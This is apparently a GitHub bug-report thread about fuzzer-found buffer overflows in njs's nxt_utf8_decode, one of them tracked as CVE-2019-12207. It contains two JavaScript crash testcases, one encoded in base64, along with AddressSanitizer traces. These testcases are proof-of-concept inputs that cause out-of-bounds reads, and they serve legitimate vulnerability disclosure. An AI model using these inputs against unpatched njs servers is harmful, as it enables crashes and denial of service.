Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

heap-buffer-overflow in nxt_utf8_decode nxt/nxt_utf8.c:72 #168

Closed
wrauner opened this issue May 20, 2019 · 4 comments

Comments

Projects
None yet
3 participants
@wrauner
Copy link

commented May 20, 2019

Testcase (in base64):

bmV3IFJlZ0V4cChuZXcgUmVnRXhwKFJlZ0V4cCgobmV3IE9iamVjdCgiADs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7GDtzOzskOzs7OzsiLCAobmV3IEVycm9yKG5ldyBFcnJvcihuZXcgRXJyb3IobmV3IEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKCgwLTApKSkpKSkpKSk8PTApKSswKSkpKQo=

njs version:
changeset: 965:e0fdef4eb478

Stack trace (from ASAN):

==22308==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500000c100 at pc 0x555c148621d9 bp 0x7ffdddc241c0 sp 0x7ffdddc241b0
READ of size 1 at 0x62500000c100 thread T0
    #0 0x555c148621d8 in nxt_utf8_decode nxt/nxt_utf8.c:72
    #1 0x555c14862905 in nxt_utf8_length nxt/nxt_utf8.c:271
    #2 0x555c147b5a06 in njs_regexp_prototype_source njs/njs_regexp.c:674
    #3 0x555c147b5a06 in njs_regexp_constructor njs/njs_regexp.c:131
    #4 0x555c147a9cdb in njs_function_native_call njs/njs_function.c:587
    #5 0x555c146d1d82 in njs_vmcode_function_call njs/njs_vm.c:2061
    #6 0x555c146c7d47 in njs_vmcode_interpreter njs/njs_vm.c:159
    #7 0x555c146c2b83 in njs_vm_start njs/njs.c:594
    #8 0x555c146a5cc3 in njs_process_script njs/njs_shell.c:770
    #9 0x555c1469ef48 in njs_process_file njs/njs_shell.c:619
    #10 0x555c1469ef48 in main njs/njs_shell.c:281
    #11 0x7fcc25e56b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #12 0x555c146a0ef9 in _start (/home/build/njs/build/njs+0x2aef9)

Found by fluff

@jdelta-RBS

This comment has been minimized.

Copy link

commented May 20, 2019

This issue was assigned CVE-2019-12207

@wrauner

This comment has been minimized.

Copy link
Author

commented Jun 20, 2019

We found another crash in the same function with similar backtrace. @xeioex should we open new issue or reopen this one?

NJS version:

changeset:   1011:2fb43ddbce84
tag:         tip
user:        hongzhidao <hongzhidao@gmail.com>
date:        Mon Jun 10 22:23:56 2019 -0400
summary:     Added property getter/setter support in Object.defineProperty().

JS Testcase:

(new InternalError(new Object(), RegExp().source.replace((Object((ReferenceError()+{get: function () {
}}))||Object.isExtensible()), RegExp().source.replace((RegExp()||ignoreCase.startsWith()), function v0() {
}, Number(), Boolean(), Error(), TypeError(), Boolean(), Error(), Object(), 0)))+0)

ASAN log:

=================================================================
==3788==ERROR: AddressSanitizer: global-buffer-overflow on address 0x5566629c2ab8 at pc 0x55666274915c bp 0x7ffefaee9990 sp 0x7ffefaee9980
READ of size 1 at 0x5566629c2ab8 thread T0
    #0 0x55666274915b in nxt_utf8_decode nxt/nxt_utf8.c:72
    #1 0x556662749796 in nxt_utf8_length nxt/nxt_utf8.c:271
    #2 0x5566625d3857 in njs_string_replace_join njs/njs_string.c:3661
    #3 0x5566625e40ee in njs_string_replace_regexp_join njs/njs_string.c:3280
    #4 0x5566625e40ee in njs_string_replace_regexp njs/njs_string.c:3163
    #5 0x5566625e40ee in njs_string_prototype_replace njs/njs_string.c:3058
    #6 0x55666268dc13 in njs_function_native_call njs/njs_function.c:587
    #7 0x5566625b0592 in njs_vmcode_continuation njs/njs_vm.c:2336
    #8 0x5566625b0cb3 in njs_vmcode_interpreter njs/njs_vm.c:159
    #9 0x5566625ab693 in njs_vm_start njs/njs.c:594
    #10 0x55666258e8a9 in njs_process_script njs/njs_shell.c:772
    #11 0x556662587cc8 in njs_process_file njs/njs_shell.c:621
    #12 0x556662587cc8 in main njs/njs_shell.c:283
    #13 0x7f67abf81b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #14 0x556662589db9 in _start (/home/build/njs/build/njs+0x2bdb9)

0x5566629c2ab8 is located 40 bytes to the left of global variable '__compound_literal.29' defined in 'njs/njs_object.c:2284:18' (0x5566629c2ae0) of size 56
0x5566629c2ab8 is located 0 bytes to the right of global variable '__compound_literal.30' defined in 'njs/njs_object.c:2292:18' (0x5566629c2a80) of size 56
SUMMARY: AddressSanitizer: global-buffer-overflow nxt/nxt_utf8.c:72 in nxt_utf8_decode
Shadow bytes around the buggy address:
  0x0aad4c530500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0aad4c530510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0aad4c530520: 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
  0x0aad4c530530: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 f9 f9
  0x0aad4c530540: f9 f9 f9 f9 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
=>0x0aad4c530550: 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 00 00 00 00
  0x0aad4c530560: 00 00 00 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
  0x0aad4c530570: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
  0x0aad4c530580: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
  0x0aad4c530590: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
  0x0aad4c5305a0: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==3788==ABORTING
@xeioex

This comment has been minimized.

Copy link
Contributor

commented Jun 20, 2019

@wrauner please create a separate issue

@wrauner

This comment has been minimized.

Copy link
Author

commented Jun 20, 2019

@xeioex tried the patch that you mentioned earlier and it still crased, created new issue #183

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.